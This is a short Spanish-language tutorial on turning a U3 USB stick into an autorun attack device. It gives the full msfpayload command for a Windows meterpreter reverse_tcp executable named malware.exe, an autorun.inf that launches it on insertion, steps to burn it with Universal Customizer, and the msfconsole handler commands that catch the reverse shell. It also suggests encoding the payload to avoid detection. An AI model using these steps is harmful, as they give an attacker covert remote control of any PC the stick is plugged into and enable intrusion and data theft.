En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.
La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.
1. Generamos el Payload con MetaSploit
En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:
./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe
Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.
2. Creamos nuestra ISO
Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio «U3CUSTOM» y creamos el archivo «autorun.inf» con el siguiente contenido:
[AutoRun]
open=malware.exe
Luego ejecutamos «ISOCreate.cmd» y dentro del directorio «BIN» se va a crear nuestra ISO con el nombre «U3CUSTOM.ISO». Si no creamos nuestra ISO, Universal Customizer va a utilizar la «U3CUSTOM.ISO» que ya viene dentro del paquete, con una versión de Hacksaw.
3. Grabamos la ISO
Luego corremos Universal Customizer y vamos siguiendo los pasos:
Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.
4. Escuchamos por la Conexión Reversa
Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:
./msfconsole
use exploit/multi/handler
set PAYLAOD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
set ExitOnSession false
exploit -j
Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.
Via:
KUNGFO